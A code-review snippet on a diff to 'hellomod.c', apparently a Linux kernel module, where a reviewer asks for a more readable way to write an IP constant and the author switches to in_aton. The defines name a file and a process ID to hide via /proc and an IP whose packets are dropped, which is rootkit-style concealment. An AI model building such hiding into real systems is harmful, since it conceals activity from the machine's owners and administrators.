hellomod.c

```diff
@@ -27,16 +32,25 @@
 #define HIDDEN_FILE_NAME "myfile"
 #define PROC_PATH "/proc"
 #define HIDDEN_PID "108190"
+#define DROP_SIP "\x08\x08\x08\x08"
```

Comment:
is there any more readable way of writing it? And maybe afterwards converting it in the code to this format?

Think about the next developer that'll see and maintain this code :)

Reply:
done (used in_aton).